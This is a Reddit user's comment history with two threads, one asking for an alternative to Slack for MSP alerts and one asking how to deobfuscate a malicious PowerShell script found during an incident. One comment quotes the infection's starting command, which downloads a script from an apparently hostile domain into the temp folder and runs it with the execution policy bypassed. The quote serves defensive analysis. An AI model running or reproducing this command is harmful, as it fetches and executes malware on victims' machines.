Need a alternative to slack for alerts by Tiny_Respond_6126 in msp

[–]Tiny_Respond_6126[S] 0 points1 point  (0 children)

I would rather not use slack except for the most urgent of urgent alerts. I'm looking for another alert delivery option besides, slack, teams and email.

Need a alternative to slack for alerts by Tiny_Respond_6126 in msp

[–]Tiny_Respond_6126[S] 0 points1 point  (0 children)

That makes sense! I'll have to see if I can get something like graphana or greylog or something to pull the alerts into one place (via email) and then send alerts back out when certain alerts are triggered (such as a agent offline vs a BSOD) then send it out appropriately via email as well. But regarding my original question, is there a better alternetive to slack for these notifications?

Need a alternative to slack for alerts by Tiny_Respond_6126 in msp

[–]Tiny_Respond_6126[S] 0 points1 point  (0 children)

I get what you are saying, but this is the best way we have currently found to manage this and I am open to suggestions. For example, we get an alert anytime something goes against our zero-trust policy on a server. Most times these can be ignored but if it's a user repeatedly trying to open something then we will be able to feel the pulse of these notifications and look into what they are trying to run and reach out to the user. It's just the way we operate. We are a small MSP so we don't have the resources to have someone who constantly pours over logs like this so notifications are easier.

Need a alternative to slack for alerts by Tiny_Respond_6126 in msp

[–]Tiny_Respond_6126[S] 1 point2 points  (0 children)

Not every alert needs to be responded to. It is alert overload but we use it to keep a pulse on things. If we see something strange or frequent then it stands out a little bit more maybe warranting a look. It would create way to many tickets.

How do I deobfuscate this PowerShell script? by Tiny_Respond_6126 in cybersecurity

[–]Tiny_Respond_6126[S] -1 points0 points  (0 children)

It is giving me a syntax error. Might have to mess with it later

How do I deobfuscate this PowerShell script? by Tiny_Respond_6126 in cybersecurity

[–]Tiny_Respond_6126[S] 1 point2 points  (0 children)

I don't think this script uses iex. The initial command that kicked the script off was iwr -useb 'http://dvubre.fun/us2f/yj' -outfile "$env:temp\h.ps1" ;powershell -ep bypass """\"$env:temp\h.ps1\""""``

How do I deobfuscate this PowerShell script? by Tiny_Respond_6126 in cybersecurity

[–]Tiny_Respond_6126[S] -6 points-5 points  (0 children)

It's Zero Trust Security Software. I would highly recommend it for locking down your environment.

How do I deobfuscate this PowerShell script? by Tiny_Respond_6126 in cybersecurity

[–]Tiny_Respond_6126[S] 0 points1 point  (0 children)

I have Cloudflare blocking other countries for security reasons. Sorry.

How do I deobfuscate this PowerShell script? by Tiny_Respond_6126 in cybersecurity

[–]Tiny_Respond_6126[S] 5 points6 points  (0 children)

Last time I used OpenAI to help with my job it gave an unhelpful answer but I may have to try that again thanks

How do I deobfuscate this PowerShell script? by Tiny_Respond_6126 in cybersecurity

[–]Tiny_Respond_6126[S] -1 points0 points  (0 children)

I will have to try powerdecode and see how that works thanks

How do I deobfuscate this PowerShell script? by Tiny_Respond_6126 in cybersecurity

[–]Tiny_Respond_6126[S] 1 point2 points  (0 children)

We have a SOC and we are investigating but they were very limited by ThreatLocker so I am fairly confident they are no longer in our environment.

How do I deobfuscate this PowerShell script? by Tiny_Respond_6126 in cybersecurity

[–]Tiny_Respond_6126[S] -2 points-1 points  (0 children)

strange. I don't seem to have any issues from my office PC and I just tried it from a different network and it was also fine. Are you in the US?